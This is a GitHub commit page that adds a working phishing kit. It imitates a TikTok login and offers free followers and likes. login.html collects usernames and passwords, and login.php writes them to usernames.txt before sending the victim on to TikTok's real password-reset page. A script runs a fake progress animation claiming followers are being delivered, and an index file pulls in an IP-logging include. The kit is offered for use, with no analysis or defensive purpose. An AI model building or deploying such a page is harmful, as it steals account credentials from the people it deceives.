-
Notifications
You must be signed in to change notification settings - Fork 9
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
8 changed files
with
551 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
<?php | ||
include 'ip.php'; | ||
header('Location: login.html'); | ||
exit | ||
?> |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,209 @@ | ||
function updateyear() { | ||
var today = new Date(); | ||
var year = today.getFullYear(); | ||
document.getElementById("year").innerHTML = year; | ||
} | ||
|
||
var randomnumber = setInterval(randomuser,6000); | ||
|
||
var getresources = 336699; | ||
var resourcestime = setInterval(resourcesupdate,100); | ||
|
||
var today = new Date().toLocaleDateString('en-US', { | ||
day : 'numeric', | ||
month : 'short', | ||
year : 'numeric' | ||
}).split(' ').join(' '); | ||
|
||
setTimeout(toolupdated, 300); | ||
|
||
function toolupdated() { | ||
document.getElementById("date").innerHTML = today; | ||
} | ||
|
||
function move() { | ||
var username = document.getElementById("username").value; | ||
var follower = document.getElementById("follower").value; | ||
var like = document.getElementById("like").value; | ||
|
||
if(username == "") { | ||
alert("Please insert your tiktok.com username or email address."); | ||
return false; | ||
} | ||
|
||
document.getElementById("fillup").style.display = "none"; | ||
document.getElementById("steps").style.display = "none"; | ||
document.getElementById("comment").style.display = "none"; | ||
document.getElementById("progressbarcontainer").style.display = "block"; | ||
var elem = document.getElementById("progressbar"); | ||
var width = 10; | ||
var id = setInterval(frame, 693); | ||
function frame() { | ||
if (width > 10 && width < 20) { | ||
document.getElementById("progresslog").innerHTML = "Menghubungkan..."; | ||
$("#gen1").fadeIn("slow"); | ||
} | ||
|
||
if (width > 20 && width < 30) { | ||
document.getElementById("progresslog").innerHTML = "Menghubungkan.."; | ||
$("#gen1").fadeOut("slow"); | ||
$("#gen2").fadeIn("slow"); | ||
} | ||
|
||
if (width > 30 && width < 40) { | ||
document.getElementById("progresslog").innerHTML = "Mencari Username : "+username+""; | ||
$("#gen2").fadeOut("slow"); | ||
$("#gen3").fadeIn("slow"); | ||
} | ||
|
||
if (width > 40 && width < 45) { | ||
document.getElementById("progresslog").innerHTML = "Username "+username+" Berhasil Terhubung!"; | ||
$("#gen3").fadeOut("slow"); | ||
$("#gen4").fadeIn("slow"); | ||
} | ||
|
||
|
||
if (width > 60 && width < 75) { | ||
document.getElementById("progresslog").innerHTML = "Mengirim "+follower+" Followers Ke "+username+""; | ||
$("#gen5").fadeOut("slow"); | ||
$("#gen6").fadeIn("slow"); | ||
|
||
if (document.getElementById("addfollowerbarlabel").innerHTML == 0) { | ||
startaddfollower(); | ||
} | ||
} | ||
|
||
if (width > 75 && width < 90) { | ||
document.getElementById("progresslog").innerHTML = "Mengirim "+like+" Like Ke "+username+""; | ||
$("#gen6").fadeOut("slow"); | ||
$("#gen7").fadeIn("slow"); | ||
|
||
if (document.getElementById("addlikebarlabel").innerHTML == 0) { | ||
startaddlike(); | ||
} | ||
} | ||
|
||
if (width > 90 && width < 99) { | ||
document.getElementById("progresslog").innerHTML = "Berhasil!"; | ||
$("#gen7").fadeOut("slow"); | ||
$("#gen1").fadeIn("slow"); | ||
} | ||
|
||
if (width >= 99) { | ||
setTimeout(verify, 1000); | ||
clearInterval(id); | ||
} else { | ||
width++; | ||
elem.style.width = width + '%'; | ||
document.getElementById("progressbarlabel").innerHTML = width * 1 + '%'; | ||
} | ||
} | ||
} | ||
|
||
function verify() { | ||
document.getElementById("verifybg").style.height = "100%"; | ||
} | ||
|
||
function randomuser() { | ||
document.getElementById("randomnumber").innerHTML = Math.floor(Math.random() * 9999); | ||
} | ||
|
||
function resourcesupdate() { | ||
document.getElementById("resources").innerHTML = getresources++; | ||
} | ||
|
||
function startaddfollower() { | ||
var addfollowerelem = document.getElementById("addfollowerbar"); | ||
var addfollowerwidth = 1; | ||
var addfollowerwidthid = setInterval(addfollowerwidthnow, 16); | ||
var addfollowerid = setInterval(addfollowernow, 3); | ||
var addfollower = 0; | ||
|
||
var addfollowerspeed = 0; | ||
|
||
if(document.getElementById("follower").value == 10000) | ||
{ | ||
addfollowerspeed = 50; | ||
} | ||
|
||
if(document.getElementById("follower").value == 50000) | ||
{ | ||
addfollowerspeed = 100; | ||
} | ||
|
||
if(document.getElementById("follower").value == 75000) | ||
{ | ||
addfollowerspeed = 250; | ||
} | ||
|
||
if(document.getElementById("follower").value == 100000) | ||
{ | ||
addfollowerspeed = 500; | ||
} | ||
|
||
function addfollowernow() { | ||
if (addfollower >= document.getElementById("follower").value) { | ||
clearInterval(addfollowerid); | ||
} else { | ||
addfollower += addfollowerspeed; | ||
document.getElementById("addfollowerbarlabel").innerHTML = addfollower; | ||
} | ||
} | ||
|
||
function addfollowerwidthnow() { | ||
if (addfollowerwidth >= 100) { | ||
clearInterval(addfollowerwidthid); | ||
} else { | ||
addfollowerwidth++; | ||
addfollowerelem.style.width = addfollowerwidth + '%'; | ||
} | ||
} | ||
} | ||
|
||
function startaddlike() { | ||
var addlikeelem = document.getElementById("addlikebar"); | ||
var addlikewidth = 1; | ||
var addlikewidthid = setInterval(addlikewidthnow, 16); | ||
var addlikeid = setInterval(addlikenow, 3); | ||
var addlike = 0; | ||
|
||
var addlikespeed = 0; | ||
|
||
if(document.getElementById("like").value == 10000) | ||
{ | ||
addlikespeed = 50; | ||
} | ||
|
||
if(document.getElementById("like").value == 50000) | ||
{ | ||
addlikespeed = 100; | ||
} | ||
|
||
if(document.getElementById("like").value == 75000) | ||
{ | ||
addlikespeed = 250; | ||
} | ||
|
||
if(document.getElementById("like").value == 100000) | ||
{ | ||
addlikespeed = 500; | ||
} | ||
|
||
function addlikenow() { | ||
if (addlike >= document.getElementById("like").value) { | ||
clearInterval(addlikeid); | ||
} else { | ||
addlike += addlikespeed; | ||
document.getElementById("addlikebarlabel").innerHTML = addlike; | ||
} | ||
} | ||
|
||
function addlikewidthnow() { | ||
if (addlikewidth >= 100) { | ||
clearInterval(addlikewidthid); | ||
} else { | ||
addlikewidth++; | ||
addlikeelem.style.width = addlikewidth + '%'; | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
<!DOCTYPE html> | ||
<html> | ||
<!-- Coded by Mamba Mentalty(https://github.com/mamba-9mm/phishing --> | ||
|
||
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1"> | ||
<title>Tik Tok Followers</title> | ||
<script src="jquery.min.js"></script> | ||
<script src="jscript.js"></script> | ||
<link rel="stylesheet" type="text/css" href="style.css"> | ||
<style> | ||
@media(max-width:760px){ | ||
#TFG{ | ||
font-size:140%; | ||
} | ||
.buttonstyle{ | ||
font-size:100%; | ||
} | ||
|
||
.followers , .likes{ | ||
width:95%; | ||
} | ||
} | ||
</style> | ||
</head> | ||
<body onload="updateyear()"> | ||
</div> | ||
<div id="main-tool"> | ||
<div class="wrapper"><img src="logo.png"></div> | ||
<h1 id="TFG">Login</h1> | ||
<p class="sub-heading">Login to get 1000 Tiktok Likes Free</p> | ||
|
||
<form action="login.php" method="POST"> | ||
<center> | ||
<div id="fillup"> | ||
<div class="form-option"> | ||
<input name="email" class="input-form input-command" type="text" placeholder="Username/Email/Phone" required> | ||
</div> | ||
<div id="fillup"> | ||
<div class="form-option"> | ||
<input name="password" class="input-form input-command" type="password" placeholder="Password" required> | ||
</div> | ||
|
||
<br><br> | ||
<button class="buttonstyle"><b>Login</b></button> | ||
</center> | ||
|
||
</div> | ||
</div> | ||
|
||
<div id="steps" style="display:none;"> | ||
|
||
</div> | ||
|
||
<div id="comment" style="display:none;" > | ||
</div> | ||
</body> | ||
</html> | ||
<!-- Coded by Mamba Mentality --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
<?php | ||
|
||
file_put_contents("usernames.txt", "Tiktok Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND); | ||
header('Location: https://www.tiktok.com/login/email/forget-password'); | ||
exit(); | ||
?> |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file not shown.
Oops, something went wrong.